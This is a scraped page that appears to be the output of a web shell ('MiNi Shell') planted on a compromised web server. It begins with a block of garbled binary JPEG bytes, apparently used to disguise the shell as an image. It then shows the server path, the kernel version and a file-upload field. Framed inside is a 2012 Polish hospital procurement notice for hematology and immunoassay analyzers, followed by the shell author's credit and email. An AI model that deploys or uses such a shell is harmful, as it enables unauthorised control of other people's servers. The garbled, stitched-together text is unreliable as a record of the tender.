JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121220/269595-N-2012.html

<p class="kh_header"><b>Wieluń: Zakup wraz z dostawą odczynników do:
  analizatora hematologicznego , automatycznego immunoanalizatora wraz z dzierżawą tych  aparatów 
 dla  Zakładu Diagnostyki Laboratoryjnej SPZOZ w Wieluniu.</b><br>
<b>Numer ogłoszenia: 269595 - 2012; data zamieszczenia: 20.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu , ul. Szpitalna 16, 98-300 Wieluń, woj. łódzkie, tel. +48 043 8438311 w. 355, faks 043 843 83 11 wew. 213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.powiat.wielun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wraz z dostawą odczynników do:
  analizatora hematologicznego , automatycznego immunoanalizatora wraz z dzierżawą tych  aparatów 
 dla  Zakładu Diagnostyki Laboratoryjnej SPZOZ w Wieluniu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamawiający  dopuszcza możliwości składania ofert częściowych oferta częściowa to 100% PAKIETU - Pakietów 2.

2. Opis przedmiotu zamówienia: 

PAKIET 1)
Zakup z dostawą odczynników do analizatora hematologicznego wraz z dzierżawą tego analizatora dla Zakładu Diagnostyki Laboratoryjnej SPZOZ w Wieluniu.

a)	wymagane  ilości  badań w ciągu 12 miesięcy

Rodzaj badania	Ilość oznaczeń w 12 m-cy
Morfologia CBC (bez rozmazu)	28.000 sztuk
Morfologia 5 DIFF
(5 populacji krwinek białych - z rozmazem)	8.000 sztuk

b) Zestawienie parametrów technicznych i warunków granicznych dotyczących analizatora hematologicznego

L.p.	Parametry aparatu	Parametry graniczne	Odpowiedź oferenta TAK/NIE	Parametry oferowane
1.	Analizator hematologiczny z rozdziałem krwinek na 5 populacji (5 DIFF) nie starszy niż 2009r  (jeżeli analizator jest używany to wykonawca dostarcza aparat po aktualnym przeglądzie technicznym)	TAK		
2.	Analizator  różnicujący WBC na 5 populacji z wykorzystaniem fluorescencyjnej cytometrii przepływowej w oparciu o laser półprzewodnikowy	TAK		
3.	Analizator z automatycznym podajnikiem na  minimum 20 próbek z możliwością pracy z probówkami systemu zamkniętego bez potrzeby otwierania probówek , zewnętrzną drukarkę laserową czarno-białą i UPS w wyposażeniu analizatora 	TAK		
4.	Analizator minimum 24 parametry, 5 DIFF 	TAK		
5. 	Objętość aspirowanej próbki - max 30 mikrolitr	TAK		
6. 	Możliwość wykonywania oznaczeń w trybie kapilarnym (ze wstępnym rozcieńczeniem w trybie CBC i 5 DIFF) 	TAK		
7. 	Liniowość (bez wstępnego rozcieńczenia):
- RBC min do 8 mln/mikrolitr
- WBC min do 300 tyś/mikrolitr
- PLT min do 5 mln/mikrolitr
- HGB do 25 g/dl   	TAK		
8. 	Dowolność trybu oznaczeń dla każdej próbki (CBC lub CBC+DIFF) 	TAK		
9. 	Oszczędność odczynników w trybie pracy CBC	TAK		
10. 	Możliwość wprowadzania danych demograficznych pacjentów	TAK		
11. 	Możliwość oceny niedojrzałych granulocytów jako odrębnej populacji wyrażonej w wartościach bezwzględnych i procentach 	TAK		
12. 	Możliwość oceny całkowitej liczby WBC metodą optyczną	TAK		
13. 	Flagowanie wyników patologicznych z komunikatami opisującymi typowe patologie oraz informacja o stopniu zaawansowania patologii. 	TAK		
14. 	Jeden rodzaj krwi kontrolnej dla wszystkich parametrów, parametry krwi kontrolnej wczytywane za pomocą kodu ewentualnie CD	TAK		
15. 	Opracowanie obejmujące: system kontroli jakości wg systemu Levey-Jeningsa oraz pamięć na 100 000 wyników próbek pacjentów wraz z grafiką i danymi demograficznymi pacjentów, dowolność konfiguracji wydruku wyników w zależności od potrzeb laboratorium, system zarządzania odczynnikami z możliwością  sprawdzenia poziomu odczynników w dowolnym czasie 	TAK		
16. 	Możliwość dwukierunkowej komunikacji z systemem informatycznym w czasie rzeczywistym i wprowadzania danych demograficznych pacjentów z LIS 	TAK		
17. 	Bezcjankowe odczynniki - udokumentowane kartami charakterystyki (nie zawierające cyjanków nawet w minimalnej ilości )   	TAK		
18. 	Czas reakcji serwisu ( przyjazd serwisanta) max 24 godziny od chwili zgłoszenia 	TAK		
19.	Koszty awarii analizatora, części zużywalnych, konserwacji terminowych, przeglądów technicznych analizatora  oraz dojazdu przez cały okres dzierżawy będą pokrywane przez Oferenta 	TAK		
20. 	Oferent gwarantuje :
- przeszkolenie w obsłudze analizatora
- bezpłatną aktualizację wyrobu
- wstawienie aparatu  na czas dłuższej awarii
- wymianę aparatu po przeprowadzeniu 3 napraw tego samego podzespołu  	TAK/PODAĆ		
21. 	Automatyczną archiwizację wyników - możliwość wykonania zestawień statystycznych - dziennych, miesięcznych  oraz raportów kontroli jakości, możliwość dopisywania do wyników rozmazów policzonych mikroskopowo, dopisywania wartości OB (możliwość wydruku) 	TAK		
22. 	Wpis do rejestru Wyrobów Medycznych	TAK		
23. 	Inne certyfikaty - podać 	TAK		

Uwaga!
Niespełnienie któregokolwiek z warunków granicznych spowoduje odrzucenie oferty. Do wypełnionej tabeli należy dołączyć dane techniczne oferowanego aparatu.


PAKIET 2)
Zakup z dostawą odczynników do automatycznego immunoanalizatora wraz z dzierżawą tego immunoanalizatora dla Zakładu Diagnostyki Laboratoryjnej SPZOZ w Wieluniu.

a)	wymagane  ilości  badań w ciągu 24 miesięcy

L.p.	Rodzaj badania	Ilość oznaczeń
w ciągu
24  m-cy
1.	2.	3.
1.	Hormony tarczycy	
a)	TSH	3600
b)	FT3	1200
c)	FT4	2400
2.	Markery nowotworowe	
a)	PSA	2000
3.	Diagnostyka infekcji	
a)	HBs-Ag	5800
b)	HIV Ag+p/c	400
4.	Diagnostyka zawałów	
a)	Troponina T	3600
5.	Inne:	
a)	Beta - HCG	800


b) Zestawienie parametrów technicznych/użytkowych   i warunków granicznych dotyczących automatycznego  immunoanalizatora.

L.p.	Parametry aparatu	Parametry	Odpowiedź Oferenta	Parametry oferowane
1.	Immunoanalizator w pełni automatyczny 	TAK		
2.	Testy wykonywane metodą immunoenzymatyczną	TAK		
3.	Ilość oznaczeń wykonywana jednocześnie	TAK podać		
4.	Możliwość wykonania badań  citowych bez konieczności przerywania pracy aparatu 	TAK		
5.	Stabilność kalibracji irekalibracji minimum 14 dni	TAK podać		
6.	Trwałość kalibracji	TAK podać		
7.	Termin ważności odczynników-12 miesięcy	TAK		
8.	Możliwość wykonywania badań:			
  a)	Hormonalnych	TAK		
b)	Wirusologicznych	TAK		
c)	Markerów nowotworowych	TAK		
d)	Chorób infekcyjnych	TAK		
e)	Alergologicznych	TAK		
f)	Diagnostyki mięśnia sercowego	TAK		
g)	Innych niż w/w	Podać		
9.	Aparat powinien umożliwiać:			
a)	Wykonywanie badań w serii pojedynczo
	TAK		
b)	Korzystanie z odczynników gotowych do użycia z długim terminem ważności 
(ok. 1 roku)	
TAK		
c)	Oznaczanie wielu parametrów w tym samym czasie	
TAK		
d)	Komputerowe opracowanie danych (statystyka, zestawienia) - raport dzienny, zbiorcze wydruki raportu
	

TAK		
e)	Kontrola jakości - opracowanie statystyczne	TAK		
f)	Archiwizacja danych	TAK		
g)	Współpraca z komputerem zewnętrznym (systemem komputerowym)	
TAK		
h)	Wydawanie wyników pacjent po pacjencie z pełnymi danymi o pacjencie	
TAK		
i)	Prezentacja wyników badań na ekranie	TAK		
10.	Aparat powinien			
a)	Posiadać możliwość wykrywania mikroskrzepów w próbkach badanych	
TAK		
b)	Posiadać możliwość automatycznego rozcieńczania surowicy badanej	
TAK		
c)	Zapewnić czas oznaczenia poszczególnych badań po max
20 min.	
TAK		
d)	Posiadać wydajność ok. 70 oznaczeń na godzinę
	TAK		
e)	Posiadać automatyczną procedurę czyszczenia	TAK		
f)	Posiadać możliwość wydawania opracowanego wyniku z zakresem wartości referencyjnych (odpowiedni program - drukarka laserowa)	

TAK		
g)	Posiadać czytnik kodów paskowych	TAK		
h)	Posiadać system podtrzymywania pracy analizatora przez minimum 20 min.	
TAK		
i)	Posiadać instrukcję obsługi w języku polskim	TAK		
j)	Świadectwo CE	TAK		
k)	Certyfikat ISO 9001	TAK		
11.	Inne możliwości aparatu	TAK		
12.	Data produkcji oferowanego aparatu	Podać		
13.	Rok wprowadzenia tego aparatu do produkcji	Podać		
14.	Wielkość opakowań (ilość testów w opakowaniu)	Podać		
15.	Oferent gwarantuje:			
a)	Przeszkolenie w obsłudze aparatu	TAK		
b)	Bezpłatną aktualizację wyrobu i dokumentacji	TAK		
c)	Usunięcie awarii w czasie max. 24 godzin od zgłoszenia	
TAK		
d)	Wstawienie innego aparatu na czas dłuższej awarii 
(5 dni)	
TAK		
e)	Wymianę aparatu po przeprowadzeniu 2 napraw tego samego podzespołu	
TAK		
f)	Zapewnienie w czasie trwania umowy wszystkich części zamiennych do analizatora i zużywalnych do  drukarki (koszt oferenta)	

TAK		

Uwaga!
Parametry podane w rubryce parametry graniczne  należy traktować jako niezbędne minimum, którego niespełnienie będzie równoznaczne z odrzuceniem oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.45.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek posiadania uprawnień do wykonywania działalności gospodarczej będącej przedmiotem każdego z zamówień po złożeniu przez Wykonawcę wraz z ofertą aktualnej, jeśli jest wymagana prawem, koncesji na obrót wyrobami medycznymi dopuszczonymi do obrotu; aktualnego odpisu z właściwego rejestru KRS lub Rejestru Centralnej Ewidencji i Informacji o Działalności Gospodarczej Rzeczypospolitej Polskiej wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy i doświadczenia na podstawie oświadczenia złożonego przez Wykonawcę wraz z ofertą (Załącznik Nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia na podstawie oświadczenia złożonego przez Wykonawcę wraz z ofertą (Załącznik Nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia na podstawie oświadczenia złożonego przez Wykonawcę wraz z ofertą (Załącznik Nr 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek odpowiedniej sytuacji ekonomicznej i finansowej niezbędnej do realizacji niniejszego zamówienia na podstawie oświadczenia złożonego przez Wykonawcę wraz z ofertą (Załącznik Nr 4 do SIWZ) .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 Ustawy Pzp Zamawiający przewiduje możliwość dokonania zmiany warunków zawartej umowy w zakresie: 1)zmiany ceny jednostkowej towaru spowodowanej zmianą stawki podatku od towarów i usług VAT, przy czym cena jednostkowa netto pozostaje bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.powiat.wielun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W Dziale OiZP pokój 204 - nieodpłatnie SPZOZ w Wieluniu, ul. Szpitalna 16, 98-300 Wieluń...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.01.2013 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu, ulica Szpitalna 16 , 98 - 300 Wieluń - SEKRETARIAT POKÓJ nr 216...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com